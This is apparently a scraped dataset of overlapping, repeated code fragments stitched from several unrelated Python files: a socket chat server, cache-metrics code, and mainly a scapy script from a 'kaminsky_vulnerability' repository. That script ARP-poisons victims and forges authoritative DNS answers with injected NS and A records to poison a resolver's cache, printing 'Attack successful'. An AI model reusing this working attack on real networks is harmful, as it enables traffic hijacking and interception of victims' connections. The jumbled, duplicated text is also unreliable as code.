s.listen(1) while True: try: cli_sock, cli_addr", "True: try: cli_sock, cli_addr = s.accept() except KeyboardInterrupt: break print('Hello,', cli_addr) while True:", "if data.strip() == 'quit': break print(data) sdata = input('> ') + '\\r\\n' cli_sock.send(sdata.encode())", "'' port = 12345 addr = (host, port) s = socket.socket() s.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR,", "port = 12345 addr = (host, port) s = socket.socket() s.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)", "= '' port = 12345 addr = (host, port) s = socket.socket() s.setsockopt(socket.SOL_SOCKET,", "True: data = cli_sock.recv(1024).decode() # 把bytes类型解码为str类型 if data.strip() == 'quit': break print(data) sdata", "= cli_sock.recv(1024).decode() # 把bytes类型解码为str类型 if data.strip() == 'quit': break print(data) sdata = input('>", "# 把bytes类型解码为str类型 if data.strip() == 'quit': break print(data) sdata = input('> ') +", "addr = (host, port) s = socket.socket() s.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1) s.bind(addr) s.listen(1) while", "s.accept() except KeyboardInterrupt: break print('Hello,', cli_addr) while True: data = cli_sock.recv(1024).decode() # 把bytes类型解码为str类型", "while True: data = cli_sock.recv(1024).decode() # 把bytes类型解码为str类型 if data.strip() == 'quit': break print(data)", "cli_addr = s.accept() except KeyboardInterrupt: break print('Hello,', cli_addr) while True: data = cli_sock.recv(1024).decode()", "data = cli_sock.recv(1024).decode() # 把bytes类型解码为str类型 if data.strip() == 'quit': break print(data) sdata =", "== 'quit': break print(data) sdata = input('> ') + '\\r\\n' cli_sock.send(sdata.encode()) # 将str编码为bytes", "cli_sock, cli_addr = s.accept() except KeyboardInterrupt: break print('Hello,', cli_addr) while True: data =", "cli_addr) while True: data = cli_sock.recv(1024).decode() # 把bytes类型解码为str类型 if data.strip() == 'quit': break", "KeyboardInterrupt: break print('Hello,', cli_addr) while True: data = cli_sock.recv(1024).decode() # 把bytes类型解码为str类型 if data.strip()" ]
[ "arppoison import sys import socket def silent(args): # ARP poison the vicitims (two", "args.soaIP: arppoison(args.victim, ip) # send query request to the victim args.randomSubdomain = utils.getRandomSubdomain()", "the vicitims (two way ARP poisoning) for ip in args.soaIP: arppoison(args.victim, ip) #", "dnsSpoof(pkt): if not pkt.haslayer(DNSQR) or not pkt.haslayer(UDP): sendp(pkt, verbose=False) else: if (globalargs.randomSubdomain in", "args.randomSubdomain = utils.getRandomSubdomain() + args.targetDomain reqPkt = IP(dst=args.victim) / UDP(sport=123) / DNS(qr=0, qd=DNSQR(qname=args.randomSubdomain))", "\\ DNS(id=pkt[DNS].id, qr=1, aa=1, rcode=0, qd=pkt[DNS].qd, \\ an=DNSRR(rrname=pkt[DNS].qd.qname, type=\"A\", rdata=\"172.16.58.3\")) send(spoof_pkt, verbose=False) print", "IP(dst=pkt[IP].src, src=pkt[IP].dst) / \\ UDP(dport=pkt[UDP].sport, sport=pkt[UDP].dport) / \\ DNS(id=pkt[DNS].id, qr=1, aa=1, rcode=0, qd=pkt[DNS].qd,", "import argparse from scapy.all import ARP, Ether, sniff, sendp, send, IP, UDP, DNS,", "sniff, sendp, send, IP, UDP, DNS, DNSQR, DNSRR from vars import ccolors import", "not pkt.haslayer(UDP): sendp(pkt, verbose=False) else: if (globalargs.randomSubdomain in pkt[DNS].qd.qname) and (pkt[IP].dst in globalargs.soaIP):", "the authoritative DNS) spoof_pkt = IP(dst=pkt[IP].src, src=pkt[IP].dst) / \\ UDP(dport=pkt[UDP].sport, sport=pkt[UDP].dport) / \\", "victim to authoritative DNS) sniff(prn=dnsSpoof) def dnsSpoof(pkt): if not pkt.haslayer(DNSQR) or not pkt.haslayer(UDP):", "response to the victim (it will think its from the authoritative DNS) spoof_pkt", "import sys import socket def silent(args): # ARP poison the vicitims (two way", "and (pkt[IP].dst == globalargs.addressToForge): spoof_pkt = IP(dst=pkt[IP].src, src=pkt[IP].dst) / \\ UDP(dport=pkt[UDP].sport, sport=pkt[UDP].dport) /", "send(spoof_pkt, verbose=False) print ccolors.OKGREEN + \"Victim DNS poisoned...\\n\" + ccolors.NC elif (globalargs.randomSubdomain in", "+ \"Victim DNS poisoned...\\n\" + ccolors.NC elif (globalargs.randomSubdomain in pkt[DNS].qd.qname) and (pkt[IP].dst ==", "= args # listen for packets on all interfaces (expect query request from", "from victim to authoritative DNS) sniff(prn=dnsSpoof) def dnsSpoof(pkt): if not pkt.haslayer(DNSQR) or not", "print ccolors.OKGREEN + \"Victim DNS poisoned...\\n\" + ccolors.NC elif (globalargs.randomSubdomain in pkt[DNS].qd.qname) and", "silent(args): # ARP poison the vicitims (two way ARP poisoning) for ip in", "rdata=globalargs.addressToForge, ttl=globalargs.ttl)) send(spoof_pkt, verbose=False) print ccolors.OKGREEN + \"Victim DNS poisoned...\\n\" + ccolors.NC elif", "the victim args.randomSubdomain = utils.getRandomSubdomain() + args.targetDomain reqPkt = IP(dst=args.victim) / UDP(sport=123) /", "pkt[DNS].qd.qname) and (pkt[IP].dst == globalargs.addressToForge): spoof_pkt = IP(dst=pkt[IP].src, src=pkt[IP].dst) / \\ UDP(dport=pkt[UDP].sport, sport=pkt[UDP].dport)", "<reponame>filipdavidovic/kaminsky_vulnerability import argparse from scapy.all import ARP, Ether, sniff, sendp, send, IP, UDP,", "Ether, sniff, sendp, send, IP, UDP, DNS, DNSQR, DNSRR from vars import ccolors", "\"Victim DNS poisoned...\\n\" + ccolors.NC elif (globalargs.randomSubdomain in pkt[DNS].qd.qname) and (pkt[IP].dst == globalargs.addressToForge):", "qd=pkt[DNS].qd, \\ an=DNSRR(rrname=pkt[DNS].qd.qname, type=\"A\", rdata=\"172.16.58.3\")) send(spoof_pkt, verbose=False) print ccolors.OKGREEN + \"Attack successful!\\n\" +", "== globalargs.addressToForge): spoof_pkt = IP(dst=pkt[IP].src, src=pkt[IP].dst) / \\ UDP(dport=pkt[UDP].sport, sport=pkt[UDP].dport) / \\ DNS(id=pkt[DNS].id,", "in args.soaIP: arppoison(args.victim, ip) # send query request to the victim args.randomSubdomain =", "ccolors.NC elif (globalargs.randomSubdomain in pkt[DNS].qd.qname) and (pkt[IP].dst == globalargs.addressToForge): spoof_pkt = IP(dst=pkt[IP].src, src=pkt[IP].dst)", "pkt.haslayer(UDP): sendp(pkt, verbose=False) else: if (globalargs.randomSubdomain in pkt[DNS].qd.qname) and (pkt[IP].dst in globalargs.soaIP): #", "ARP, Ether, sniff, sendp, send, IP, UDP, DNS, DNSQR, DNSRR from vars import", "import utils from arppoison import arppoison import sys import socket def silent(args): #", "sys import socket def silent(args): # ARP poison the vicitims (two way ARP", "spoof_pkt = IP(dst=pkt[IP].src, src=pkt[IP].dst) / \\ UDP(dport=pkt[UDP].sport, sport=pkt[UDP].dport) / \\ DNS(id=pkt[DNS].id, qr=1, aa=1,", "(globalargs.randomSubdomain in pkt[DNS].qd.qname) and (pkt[IP].dst in globalargs.soaIP): # return the response to the", "globalargs.soaIP): # return the response to the victim (it will think its from", "will think its from the authoritative DNS) spoof_pkt = IP(dst=pkt[IP].src, src=pkt[IP].dst) / \\", "to authoritative DNS) sniff(prn=dnsSpoof) def dnsSpoof(pkt): if not pkt.haslayer(DNSQR) or not pkt.haslayer(UDP): sendp(pkt,", "ar=DNSRR(rrname=globalargs.soaDomain[0], type='A', rdata=globalargs.addressToForge, ttl=globalargs.ttl)) send(spoof_pkt, verbose=False) print ccolors.OKGREEN + \"Victim DNS poisoned...\\n\" +", "import ccolors import utils from arppoison import arppoison import sys import socket def", "= IP(dst=pkt[IP].src, src=pkt[IP].dst) / \\ UDP(dport=pkt[UDP].sport, sport=pkt[UDP].dport) / \\ DNS(id=pkt[DNS].id, qr=1, aa=1, qd=pkt[DNS].qd,", "DNS, DNSQR, DNSRR from vars import ccolors import utils from arppoison import arppoison", "ip) # send query request to the victim args.randomSubdomain = utils.getRandomSubdomain() + args.targetDomain", "/ UDP(sport=123) / DNS(qr=0, qd=DNSQR(qname=args.randomSubdomain)) send(reqPkt, verbose=False) global globalargs globalargs = args #", "and (pkt[IP].dst in globalargs.soaIP): # return the response to the victim (it will", "from the authoritative DNS) spoof_pkt = IP(dst=pkt[IP].src, src=pkt[IP].dst) / \\ UDP(dport=pkt[UDP].sport, sport=pkt[UDP].dport) /", "src=pkt[IP].dst) / \\ UDP(dport=pkt[UDP].sport, sport=pkt[UDP].dport) / \\ DNS(id=pkt[DNS].id, qr=1, aa=1, rcode=0, qd=pkt[DNS].qd, \\", "IP, UDP, DNS, DNSQR, DNSRR from vars import ccolors import utils from arppoison", "print ccolors.OKGREEN + \"Attack successful!\\n\" + ccolors.NC + ccolors.WARNING + \"Terminating...\" + ccolors.NC", "import socket def silent(args): # ARP poison the vicitims (two way ARP poisoning)", "poisoning) for ip in args.soaIP: arppoison(args.victim, ip) # send query request to the", "request from victim to authoritative DNS) sniff(prn=dnsSpoof) def dnsSpoof(pkt): if not pkt.haslayer(DNSQR) or", "the victim (it will think its from the authoritative DNS) spoof_pkt = IP(dst=pkt[IP].src,", "an=DNSRR(rrname=pkt[DNS].qd.qname, type=\"A\", rdata=\"172.16.58.3\")) send(spoof_pkt, verbose=False) print ccolors.OKGREEN + \"Attack successful!\\n\" + ccolors.NC +", "verbose=False) global globalargs globalargs = args # listen for packets on all interfaces", "send query request to the victim args.randomSubdomain = utils.getRandomSubdomain() + args.targetDomain reqPkt =", "args.targetDomain reqPkt = IP(dst=args.victim) / UDP(sport=123) / DNS(qr=0, qd=DNSQR(qname=args.randomSubdomain)) send(reqPkt, verbose=False) global globalargs", "# send query request to the victim args.randomSubdomain = utils.getRandomSubdomain() + args.targetDomain reqPkt", "def silent(args): # ARP poison the vicitims (two way ARP poisoning) for ip", "rdata=\"172.16.58.3\")) send(spoof_pkt, verbose=False) print ccolors.OKGREEN + \"Attack successful!\\n\" + ccolors.NC + ccolors.WARNING +", "def dnsSpoof(pkt): if not pkt.haslayer(DNSQR) or not pkt.haslayer(UDP): sendp(pkt, verbose=False) else: if (globalargs.randomSubdomain", "\\ an=DNSRR(rrname=pkt[DNS].qd.qname, type=\"A\", rdata=\"172.16.58.3\")) send(spoof_pkt, verbose=False) print ccolors.OKGREEN + \"Attack successful!\\n\" + ccolors.NC", "for packets on all interfaces (expect query request from victim to authoritative DNS)", "victim (it will think its from the authoritative DNS) spoof_pkt = IP(dst=pkt[IP].src, src=pkt[IP].dst)", "pkt.haslayer(DNSQR) or not pkt.haslayer(UDP): sendp(pkt, verbose=False) else: if (globalargs.randomSubdomain in pkt[DNS].qd.qname) and (pkt[IP].dst", "in pkt[DNS].qd.qname) and (pkt[IP].dst in globalargs.soaIP): # return the response to the victim", "vars import ccolors import utils from arppoison import arppoison import sys import socket", "qd=pkt[DNS].qd, \\ ns=DNSRR(rrname=globalargs.targetDomain, type='NS', rdata=globalargs.soaDomain[0], ttl=globalargs.ttl), \\ ar=DNSRR(rrname=globalargs.soaDomain[0], type='A', rdata=globalargs.addressToForge, ttl=globalargs.ttl)) send(spoof_pkt, verbose=False)", "to the victim (it will think its from the authoritative DNS) spoof_pkt =", "request to the victim args.randomSubdomain = utils.getRandomSubdomain() + args.targetDomain reqPkt = IP(dst=args.victim) /", "(expect query request from victim to authoritative DNS) sniff(prn=dnsSpoof) def dnsSpoof(pkt): if not", "type='A', rdata=globalargs.addressToForge, ttl=globalargs.ttl)) send(spoof_pkt, verbose=False) print ccolors.OKGREEN + \"Victim DNS poisoned...\\n\" + ccolors.NC", "args # listen for packets on all interfaces (expect query request from victim", "DNS(id=pkt[DNS].id, qr=1, aa=1, rcode=0, qd=pkt[DNS].qd, \\ an=DNSRR(rrname=pkt[DNS].qd.qname, type=\"A\", rdata=\"172.16.58.3\")) send(spoof_pkt, verbose=False) print ccolors.OKGREEN", "DNSQR, DNSRR from vars import ccolors import utils from arppoison import arppoison import", "scapy.all import ARP, Ether, sniff, sendp, send, IP, UDP, DNS, DNSQR, DNSRR from", "or not pkt.haslayer(UDP): sendp(pkt, verbose=False) else: if (globalargs.randomSubdomain in pkt[DNS].qd.qname) and (pkt[IP].dst in", "on all interfaces (expect query request from victim to authoritative DNS) sniff(prn=dnsSpoof) def", "IP(dst=pkt[IP].src, src=pkt[IP].dst) / \\ UDP(dport=pkt[UDP].sport, sport=pkt[UDP].dport) / \\ DNS(id=pkt[DNS].id, qr=1, aa=1, qd=pkt[DNS].qd, \\", "DNS(id=pkt[DNS].id, qr=1, aa=1, qd=pkt[DNS].qd, \\ ns=DNSRR(rrname=globalargs.targetDomain, type='NS', rdata=globalargs.soaDomain[0], ttl=globalargs.ttl), \\ ar=DNSRR(rrname=globalargs.soaDomain[0], type='A', rdata=globalargs.addressToForge,", "type='NS', rdata=globalargs.soaDomain[0], ttl=globalargs.ttl), \\ ar=DNSRR(rrname=globalargs.soaDomain[0], type='A', rdata=globalargs.addressToForge, ttl=globalargs.ttl)) send(spoof_pkt, verbose=False) print ccolors.OKGREEN +", "ARP poison the vicitims (two way ARP poisoning) for ip in args.soaIP: arppoison(args.victim,", "(pkt[IP].dst in globalargs.soaIP): # return the response to the victim (it will think", "not pkt.haslayer(DNSQR) or not pkt.haslayer(UDP): sendp(pkt, verbose=False) else: if (globalargs.randomSubdomain in pkt[DNS].qd.qname) and", "+ args.targetDomain reqPkt = IP(dst=args.victim) / UDP(sport=123) / DNS(qr=0, qd=DNSQR(qname=args.randomSubdomain)) send(reqPkt, verbose=False) global", "socket def silent(args): # ARP poison the vicitims (two way ARP poisoning) for", "(globalargs.randomSubdomain in pkt[DNS].qd.qname) and (pkt[IP].dst == globalargs.addressToForge): spoof_pkt = IP(dst=pkt[IP].src, src=pkt[IP].dst) / \\", "send(reqPkt, verbose=False) global globalargs globalargs = args # listen for packets on all", "pkt[DNS].qd.qname) and (pkt[IP].dst in globalargs.soaIP): # return the response to the victim (it", "arppoison(args.victim, ip) # send query request to the victim args.randomSubdomain = utils.getRandomSubdomain() +", "UDP(dport=pkt[UDP].sport, sport=pkt[UDP].dport) / \\ DNS(id=pkt[DNS].id, qr=1, aa=1, qd=pkt[DNS].qd, \\ ns=DNSRR(rrname=globalargs.targetDomain, type='NS', rdata=globalargs.soaDomain[0], ttl=globalargs.ttl),", "ccolors.OKGREEN + \"Victim DNS poisoned...\\n\" + ccolors.NC elif (globalargs.randomSubdomain in pkt[DNS].qd.qname) and (pkt[IP].dst", "utils from arppoison import arppoison import sys import socket def silent(args): # ARP", "UDP, DNS, DNSQR, DNSRR from vars import ccolors import utils from arppoison import", "vicitims (two way ARP poisoning) for ip in args.soaIP: arppoison(args.victim, ip) # send", "(it will think its from the authoritative DNS) spoof_pkt = IP(dst=pkt[IP].src, src=pkt[IP].dst) /", "rdata=globalargs.soaDomain[0], ttl=globalargs.ttl), \\ ar=DNSRR(rrname=globalargs.soaDomain[0], type='A', rdata=globalargs.addressToForge, ttl=globalargs.ttl)) send(spoof_pkt, verbose=False) print ccolors.OKGREEN + \"Victim", "all interfaces (expect query request from victim to authoritative DNS) sniff(prn=dnsSpoof) def dnsSpoof(pkt):", "interfaces (expect query request from victim to authoritative DNS) sniff(prn=dnsSpoof) def dnsSpoof(pkt): if", "if not pkt.haslayer(DNSQR) or not pkt.haslayer(UDP): sendp(pkt, verbose=False) else: if (globalargs.randomSubdomain in pkt[DNS].qd.qname)", "(pkt[IP].dst == globalargs.addressToForge): spoof_pkt = IP(dst=pkt[IP].src, src=pkt[IP].dst) / \\ UDP(dport=pkt[UDP].sport, sport=pkt[UDP].dport) / \\", "verbose=False) print ccolors.OKGREEN + \"Attack successful!\\n\" + ccolors.NC + ccolors.WARNING + \"Terminating...\" +", "/ \\ UDP(dport=pkt[UDP].sport, sport=pkt[UDP].dport) / \\ DNS(id=pkt[DNS].id, qr=1, aa=1, rcode=0, qd=pkt[DNS].qd, \\ an=DNSRR(rrname=pkt[DNS].qd.qname,", "from vars import ccolors import utils from arppoison import arppoison import sys import", "from scapy.all import ARP, Ether, sniff, sendp, send, IP, UDP, DNS, DNSQR, DNSRR", "= IP(dst=args.victim) / UDP(sport=123) / DNS(qr=0, qd=DNSQR(qname=args.randomSubdomain)) send(reqPkt, verbose=False) global globalargs globalargs =", "think its from the authoritative DNS) spoof_pkt = IP(dst=pkt[IP].src, src=pkt[IP].dst) / \\ UDP(dport=pkt[UDP].sport,", "arppoison import arppoison import sys import socket def silent(args): # ARP poison the", "rcode=0, qd=pkt[DNS].qd, \\ an=DNSRR(rrname=pkt[DNS].qd.qname, type=\"A\", rdata=\"172.16.58.3\")) send(spoof_pkt, verbose=False) print ccolors.OKGREEN + \"Attack successful!\\n\"", "victim args.randomSubdomain = utils.getRandomSubdomain() + args.targetDomain reqPkt = IP(dst=args.victim) / UDP(sport=123) / DNS(qr=0,", "DNSRR from vars import ccolors import utils from arppoison import arppoison import sys", "ARP poisoning) for ip in args.soaIP: arppoison(args.victim, ip) # send query request to", "listen for packets on all interfaces (expect query request from victim to authoritative", "ttl=globalargs.ttl)) send(spoof_pkt, verbose=False) print ccolors.OKGREEN + \"Victim DNS poisoned...\\n\" + ccolors.NC elif (globalargs.randomSubdomain", "query request to the victim args.randomSubdomain = utils.getRandomSubdomain() + args.targetDomain reqPkt = IP(dst=args.victim)", "globalargs.addressToForge): spoof_pkt = IP(dst=pkt[IP].src, src=pkt[IP].dst) / \\ UDP(dport=pkt[UDP].sport, sport=pkt[UDP].dport) / \\ DNS(id=pkt[DNS].id, qr=1,", "# listen for packets on all interfaces (expect query request from victim to", "qr=1, aa=1, qd=pkt[DNS].qd, \\ ns=DNSRR(rrname=globalargs.targetDomain, type='NS', rdata=globalargs.soaDomain[0], ttl=globalargs.ttl), \\ ar=DNSRR(rrname=globalargs.soaDomain[0], type='A', rdata=globalargs.addressToForge, ttl=globalargs.ttl))", "/ DNS(qr=0, qd=DNSQR(qname=args.randomSubdomain)) send(reqPkt, verbose=False) global globalargs globalargs = args # listen for", "import ARP, Ether, sniff, sendp, send, IP, UDP, DNS, DNSQR, DNSRR from vars", "way ARP poisoning) for ip in args.soaIP: arppoison(args.victim, ip) # send query request", "ccolors.OKGREEN + \"Attack successful!\\n\" + ccolors.NC + ccolors.WARNING + \"Terminating...\" + ccolors.NC sys.exit()", "ccolors import utils from arppoison import arppoison import sys import socket def silent(args):", "/ \\ UDP(dport=pkt[UDP].sport, sport=pkt[UDP].dport) / \\ DNS(id=pkt[DNS].id, qr=1, aa=1, qd=pkt[DNS].qd, \\ ns=DNSRR(rrname=globalargs.targetDomain, type='NS',", "verbose=False) else: if (globalargs.randomSubdomain in pkt[DNS].qd.qname) and (pkt[IP].dst in globalargs.soaIP): # return the", "to the victim args.randomSubdomain = utils.getRandomSubdomain() + args.targetDomain reqPkt = IP(dst=args.victim) / UDP(sport=123)", "+ ccolors.NC elif (globalargs.randomSubdomain in pkt[DNS].qd.qname) and (pkt[IP].dst == globalargs.addressToForge): spoof_pkt = IP(dst=pkt[IP].src,", "type=\"A\", rdata=\"172.16.58.3\")) send(spoof_pkt, verbose=False) print ccolors.OKGREEN + \"Attack successful!\\n\" + ccolors.NC + ccolors.WARNING", "\\ DNS(id=pkt[DNS].id, qr=1, aa=1, qd=pkt[DNS].qd, \\ ns=DNSRR(rrname=globalargs.targetDomain, type='NS', rdata=globalargs.soaDomain[0], ttl=globalargs.ttl), \\ ar=DNSRR(rrname=globalargs.soaDomain[0], type='A',", "\\ UDP(dport=pkt[UDP].sport, sport=pkt[UDP].dport) / \\ DNS(id=pkt[DNS].id, qr=1, aa=1, rcode=0, qd=pkt[DNS].qd, \\ an=DNSRR(rrname=pkt[DNS].qd.qname, type=\"A\",", "verbose=False) print ccolors.OKGREEN + \"Victim DNS poisoned...\\n\" + ccolors.NC elif (globalargs.randomSubdomain in pkt[DNS].qd.qname)", "\\ UDP(dport=pkt[UDP].sport, sport=pkt[UDP].dport) / \\ DNS(id=pkt[DNS].id, qr=1, aa=1, qd=pkt[DNS].qd, \\ ns=DNSRR(rrname=globalargs.targetDomain, type='NS', rdata=globalargs.soaDomain[0],", "argparse from scapy.all import ARP, Ether, sniff, sendp, send, IP, UDP, DNS, DNSQR,", "DNS) sniff(prn=dnsSpoof) def dnsSpoof(pkt): if not pkt.haslayer(DNSQR) or not pkt.haslayer(UDP): sendp(pkt, verbose=False) else:", "authoritative DNS) spoof_pkt = IP(dst=pkt[IP].src, src=pkt[IP].dst) / \\ UDP(dport=pkt[UDP].sport, sport=pkt[UDP].dport) / \\ DNS(id=pkt[DNS].id,", "\\ ar=DNSRR(rrname=globalargs.soaDomain[0], type='A', rdata=globalargs.addressToForge, ttl=globalargs.ttl)) send(spoof_pkt, verbose=False) print ccolors.OKGREEN + \"Victim DNS poisoned...\\n\"", "send(spoof_pkt, verbose=False) print ccolors.OKGREEN + \"Attack successful!\\n\" + ccolors.NC + ccolors.WARNING + \"Terminating...\"", "\\ ns=DNSRR(rrname=globalargs.targetDomain, type='NS', rdata=globalargs.soaDomain[0], ttl=globalargs.ttl), \\ ar=DNSRR(rrname=globalargs.soaDomain[0], type='A', rdata=globalargs.addressToForge, ttl=globalargs.ttl)) send(spoof_pkt, verbose=False) print", "UDP(sport=123) / DNS(qr=0, qd=DNSQR(qname=args.randomSubdomain)) send(reqPkt, verbose=False) global globalargs globalargs = args # listen", "aa=1, rcode=0, qd=pkt[DNS].qd, \\ an=DNSRR(rrname=pkt[DNS].qd.qname, type=\"A\", rdata=\"172.16.58.3\")) send(spoof_pkt, verbose=False) print ccolors.OKGREEN + \"Attack", "from arppoison import arppoison import sys import socket def silent(args): # ARP poison", "in globalargs.soaIP): # return the response to the victim (it will think its", "poisoned...\\n\" + ccolors.NC elif (globalargs.randomSubdomain in pkt[DNS].qd.qname) and (pkt[IP].dst == globalargs.addressToForge): spoof_pkt =", "return the response to the victim (it will think its from the authoritative", "reqPkt = IP(dst=args.victim) / UDP(sport=123) / DNS(qr=0, qd=DNSQR(qname=args.randomSubdomain)) send(reqPkt, verbose=False) global globalargs globalargs", "globalargs globalargs = args # listen for packets on all interfaces (expect query", "poison the vicitims (two way ARP poisoning) for ip in args.soaIP: arppoison(args.victim, ip)", "DNS) spoof_pkt = IP(dst=pkt[IP].src, src=pkt[IP].dst) / \\ UDP(dport=pkt[UDP].sport, sport=pkt[UDP].dport) / \\ DNS(id=pkt[DNS].id, qr=1,", "/ \\ DNS(id=pkt[DNS].id, qr=1, aa=1, qd=pkt[DNS].qd, \\ ns=DNSRR(rrname=globalargs.targetDomain, type='NS', rdata=globalargs.soaDomain[0], ttl=globalargs.ttl), \\ ar=DNSRR(rrname=globalargs.soaDomain[0],", "ttl=globalargs.ttl), \\ ar=DNSRR(rrname=globalargs.soaDomain[0], type='A', rdata=globalargs.addressToForge, ttl=globalargs.ttl)) send(spoof_pkt, verbose=False) print ccolors.OKGREEN + \"Victim DNS", "ns=DNSRR(rrname=globalargs.targetDomain, type='NS', rdata=globalargs.soaDomain[0], ttl=globalargs.ttl), \\ ar=DNSRR(rrname=globalargs.soaDomain[0], type='A', rdata=globalargs.addressToForge, ttl=globalargs.ttl)) send(spoof_pkt, verbose=False) print ccolors.OKGREEN", "# return the response to the victim (it will think its from the", "sendp, send, IP, UDP, DNS, DNSQR, DNSRR from vars import ccolors import utils", "for ip in args.soaIP: arppoison(args.victim, ip) # send query request to the victim", "sendp(pkt, verbose=False) else: if (globalargs.randomSubdomain in pkt[DNS].qd.qname) and (pkt[IP].dst in globalargs.soaIP): # return", "sniff(prn=dnsSpoof) def dnsSpoof(pkt): if not pkt.haslayer(DNSQR) or not pkt.haslayer(UDP): sendp(pkt, verbose=False) else: if", "(two way ARP poisoning) for ip in args.soaIP: arppoison(args.victim, ip) # send query", "DNS(qr=0, qd=DNSQR(qname=args.randomSubdomain)) send(reqPkt, verbose=False) global globalargs globalargs = args # listen for packets", "in pkt[DNS].qd.qname) and (pkt[IP].dst == globalargs.addressToForge): spoof_pkt = IP(dst=pkt[IP].src, src=pkt[IP].dst) / \\ UDP(dport=pkt[UDP].sport,", "globalargs = args # listen for packets on all interfaces (expect query request", "utils.getRandomSubdomain() + args.targetDomain reqPkt = IP(dst=args.victim) / UDP(sport=123) / DNS(qr=0, qd=DNSQR(qname=args.randomSubdomain)) send(reqPkt, verbose=False)", "elif (globalargs.randomSubdomain in pkt[DNS].qd.qname) and (pkt[IP].dst == globalargs.addressToForge): spoof_pkt = IP(dst=pkt[IP].src, src=pkt[IP].dst) /", "UDP(dport=pkt[UDP].sport, sport=pkt[UDP].dport) / \\ DNS(id=pkt[DNS].id, qr=1, aa=1, rcode=0, qd=pkt[DNS].qd, \\ an=DNSRR(rrname=pkt[DNS].qd.qname, type=\"A\", rdata=\"172.16.58.3\"))", "ip in args.soaIP: arppoison(args.victim, ip) # send query request to the victim args.randomSubdomain", "IP(dst=args.victim) / UDP(sport=123) / DNS(qr=0, qd=DNSQR(qname=args.randomSubdomain)) send(reqPkt, verbose=False) global globalargs globalargs = args", "# ARP poison the vicitims (two way ARP poisoning) for ip in args.soaIP:", "DNS poisoned...\\n\" + ccolors.NC elif (globalargs.randomSubdomain in pkt[DNS].qd.qname) and (pkt[IP].dst == globalargs.addressToForge): spoof_pkt", "authoritative DNS) sniff(prn=dnsSpoof) def dnsSpoof(pkt): if not pkt.haslayer(DNSQR) or not pkt.haslayer(UDP): sendp(pkt, verbose=False)", "sport=pkt[UDP].dport) / \\ DNS(id=pkt[DNS].id, qr=1, aa=1, qd=pkt[DNS].qd, \\ ns=DNSRR(rrname=globalargs.targetDomain, type='NS', rdata=globalargs.soaDomain[0], ttl=globalargs.ttl), \\", "/ \\ DNS(id=pkt[DNS].id, qr=1, aa=1, rcode=0, qd=pkt[DNS].qd, \\ an=DNSRR(rrname=pkt[DNS].qd.qname, type=\"A\", rdata=\"172.16.58.3\")) send(spoof_pkt, verbose=False)", "= utils.getRandomSubdomain() + args.targetDomain reqPkt = IP(dst=args.victim) / UDP(sport=123) / DNS(qr=0, qd=DNSQR(qname=args.randomSubdomain)) send(reqPkt,", "the response to the victim (it will think its from the authoritative DNS)", "aa=1, qd=pkt[DNS].qd, \\ ns=DNSRR(rrname=globalargs.targetDomain, type='NS', rdata=globalargs.soaDomain[0], ttl=globalargs.ttl), \\ ar=DNSRR(rrname=globalargs.soaDomain[0], type='A', rdata=globalargs.addressToForge, ttl=globalargs.ttl)) send(spoof_pkt,", "else: if (globalargs.randomSubdomain in pkt[DNS].qd.qname) and (pkt[IP].dst in globalargs.soaIP): # return the response", "= IP(dst=pkt[IP].src, src=pkt[IP].dst) / \\ UDP(dport=pkt[UDP].sport, sport=pkt[UDP].dport) / \\ DNS(id=pkt[DNS].id, qr=1, aa=1, rcode=0,", "send, IP, UDP, DNS, DNSQR, DNSRR from vars import ccolors import utils from", "if (globalargs.randomSubdomain in pkt[DNS].qd.qname) and (pkt[IP].dst in globalargs.soaIP): # return the response to", "query request from victim to authoritative DNS) sniff(prn=dnsSpoof) def dnsSpoof(pkt): if not pkt.haslayer(DNSQR)", "sport=pkt[UDP].dport) / \\ DNS(id=pkt[DNS].id, qr=1, aa=1, rcode=0, qd=pkt[DNS].qd, \\ an=DNSRR(rrname=pkt[DNS].qd.qname, type=\"A\", rdata=\"172.16.58.3\")) send(spoof_pkt,", "packets on all interfaces (expect query request from victim to authoritative DNS) sniff(prn=dnsSpoof)", "global globalargs globalargs = args # listen for packets on all interfaces (expect", "src=pkt[IP].dst) / \\ UDP(dport=pkt[UDP].sport, sport=pkt[UDP].dport) / \\ DNS(id=pkt[DNS].id, qr=1, aa=1, qd=pkt[DNS].qd, \\ ns=DNSRR(rrname=globalargs.targetDomain,", "qr=1, aa=1, rcode=0, qd=pkt[DNS].qd, \\ an=DNSRR(rrname=pkt[DNS].qd.qname, type=\"A\", rdata=\"172.16.58.3\")) send(spoof_pkt, verbose=False) print ccolors.OKGREEN +", "qd=DNSQR(qname=args.randomSubdomain)) send(reqPkt, verbose=False) global globalargs globalargs = args # listen for packets on", "its from the authoritative DNS) spoof_pkt = IP(dst=pkt[IP].src, src=pkt[IP].dst) / \\ UDP(dport=pkt[UDP].sport, sport=pkt[UDP].dport)", "import arppoison import sys import socket def silent(args): # ARP poison the vicitims" ]
[ "refreshes: tp.Optional[Metric] = None, how_long_refresh_takes: tp.Optional[MeasurableMixin] = None, evictions: tp.Optional[Metric] = None, **kwargs):", "be updated with +1 each time there's a cache hit :param cache_miss: a", "MetrifiedExclusiveWritebackCache(ExclusiveWritebackCache[K, V]): __slots__ = ('cache_miss', 'cache_hits') def __init__(self, *args, cache_hits: tp.Optional[CounterMetric] = None,", "evictions: tp.Optional[Metric] = None, **kwargs): if refreshes: old_value_getter = value_getter def value_getter_replacement(item): try:", "None, entries_waiting: tp.Optional[CallableMetric] = None, **kwargs): super().__init__(*args, **kwargs) self.cache_miss = cache_miss self.cache_hits =", "None, evictions: tp.Optional[Metric] = None, **kwargs): if refreshes: old_value_getter = value_getter def value_getter_replacement(item):", "old_value_getter(item) finally: if self.refreshes: self.refreshes.runtime(+1) value_getter = value_getter_replacement if how_long_refresh_takes: value_getter = how_long_refresh_takes.measure(value_getter=time_getter)(value_getter)", "logger = logging.getLogger(__name__) class MetrifiedCacheDict(CacheDict[K, V]): \"\"\" A CacheDict with metrics! :param cache_hits:", "self.evictions is not None: self.evictions.runtime(+1) super().evict() def __getitem__(self, item): if self.has_info_about(item): if self.cache_hits:", "with +1 each time there's a cache refresh :param how_long_refresh_takes: a metric that", "= refreshes self.evictions = evictions self.how_long_refresh_takes = how_long_refresh_takes def evict(self): if self.evictions is", "that will be updated with +1 each time there's a cache refresh :param", "LRUCacheDict, ExclusiveWritebackCache from satella.coding.typing import K, V from .. import Metric from ..metric_types.callable", "metric that will be updated with +1 each time there's a cache 